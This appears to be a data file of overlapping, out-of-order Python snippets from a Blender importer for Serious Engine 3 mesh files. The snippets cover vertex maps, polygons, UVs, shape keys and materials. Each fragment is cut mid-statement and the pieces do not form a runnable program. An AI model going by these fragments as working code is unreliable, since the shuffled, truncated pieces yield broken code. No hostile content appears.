"for vert_index in bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try:",
"1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close",
"for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex",
"file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem =",
"'REPLACE') if se3_layer.surface_maps: materials = [] for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name)",
"= [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers =",
"#open polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while",
"edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0] for",
"data = real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data def read_file(operator, context):",
"uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils import (Matrix, Vector) import math",
"= se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap",
"= True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0]",
"file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps =",
"current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces",
"se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials =",
"= file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem",
"get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index =",
"se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges =",
"next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face)",
"= se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open",
"return False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = []",
"+= 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps",
"new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps):",
"file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH:",
"face_edges = get_bl_edges(fgon_face) for face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if",
"in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices):",
"num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close",
"< num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block",
"map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index",
"element block processed_elems += 1 file_query.follows_block_end_decl() #close elements block processed_maps += 1 layer.vertex_maps_append(map)",
"= se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps",
"+ Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for se3_weight_map in",
"if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0] for real_face in real_faces]",
"se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]]",
"tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in",
"= real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j]",
"while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block num_of_values =",
"obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices",
"block num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers =",
"if num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0]",
"block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons block processed_polys = 0 while processed_polys",
"file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\")",
"in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge",
"#open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem =",
"layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex",
"in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for",
"0.0), ( 0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0, 0.0, 0.0), ( 0.0,",
"se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps:",
"file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl()",
"= material for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world = tranf_mat bpy.ops.object.transform_apply(rotation=True)",
"for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0,",
"weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values()",
"real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils",
"in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index]",
"= se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx -",
"se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for",
"se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers",
"maps block file_query.follows_block_end_decl() #close layer block processed_layers += 1 file_query.follows_block_end_decl() #close layers block",
"bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for",
"se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex",
"= 0 while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl()",
"map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps",
"se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0],",
"shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp",
"in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index =",
"= type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems = 0",
"fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge,",
"- 1 for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if current_index",
"for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in",
"= Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0,",
"False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = [] for",
"0 is_last_pointer = False last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers:",
"mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0 num_of_texcoord_maps",
"ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face",
"= file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index",
"= Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for",
"= edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0]",
"= [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([])",
"+= 1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\")",
"file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer)",
"face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count +=",
"#close vertex map block file_query.follows_block_end_decl() #close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl()",
"1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons block",
"se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs +=",
"= num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index",
"def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in",
"+= 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer block",
"(edge[0], edge[1]) if which_edge == edge or which_edge == edge_rev: return False return",
"other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index",
"in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name)",
"elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1",
"for edge in edges: edge_rev = (edge[0], edge[1]) if which_edge == edge or",
"= mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index]",
"vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type",
"enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]]",
"[] for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material",
"file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers =",
"if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]]",
"processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer",
"+= 1 file_query.follows_block_end_decl() #close layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices =",
"( 0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0, 0.0, 0.0), ( 0.0, 0.0,",
"se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp =",
"edges = [] real_faces = [] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices =",
"map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps",
"material for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world = tranf_mat bpy.ops.object.transform_apply(rotation=True) context.view_layer.update()",
"for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for",
"se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx,",
"map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map =",
"se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts):",
"for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert =",
"< num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values() processed_values",
"file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers = 0 while processed_layers < num_of_layers: layer_name",
"[] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices - 1 for current_index in range(num_of_indices):",
"edges): for edge in edges: edge_rev = (edge[0], edge[1]) if which_edge == edge",
"= get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face,",
"fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0] for real_face in real_faces] mesh =",
"+= 1 file_query.follows_block_end_decl() #close elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex",
"vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers =",
"= mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index]",
"= [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face = []",
"file_query.follows_block_end_decl() #close layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps",
"mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if",
"block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps",
"material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index]",
"map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif",
"element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems += 1 file_query.follows_block_end_decl() #close elements",
"= file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer)",
"ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face = [] for tessed_index in tessed_face:",
"real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat",
"type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems = 0 while",
"se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer",
"which_edge == edge or which_edge == edge_rev: return False return True def get_bl_face_uv_data(real_face,",
"* len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in",
"in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data =",
"[] real_faces = [] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = [] for",
"[] file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value =",
"edge[1]) if which_edge == edge or which_edge == edge_rev: return False return True",
"= False last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers",
"processed_values = 0 is_last_value = False last_value_idx = num_of_values - 1 while processed_values",
"num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index =",
"map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() #",
"map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count",
"for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]]",
"elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block",
"num_of_values: if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl()",
"mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop =",
"num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems = 0 while processed_elems",
"num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons",
"is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if",
"enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face",
"processed_elems = 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl()",
"edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices,",
"in bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try: data =",
"processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name()",
"fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in",
"se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers:",
"uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl()",
"= num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer",
"num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer)",
"if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge",
"( 0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj",
"se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons:",
"edge_index_count += 1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces =",
"num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer =",
"ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face",
"shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts",
"\"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count += 1",
"processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count",
"[] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index)",
"polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1",
"in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data",
"se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices",
"if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex",
"len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons:",
"+= 1 faces = [real_face[0] for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\")",
"weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex",
"def edge_not_in(which_edge, edges): for edge in edges: edge_rev = (edge[0], edge[1]) if which_edge",
"(1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils import (Matrix, Vector) import",
"mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index,",
"se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) +",
"file_query.follows_block_begin_decl() #open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem",
"file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps",
"= se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges",
"0 while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block num_of_values",
"+ 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices =",
"== last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type =",
"in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index]",
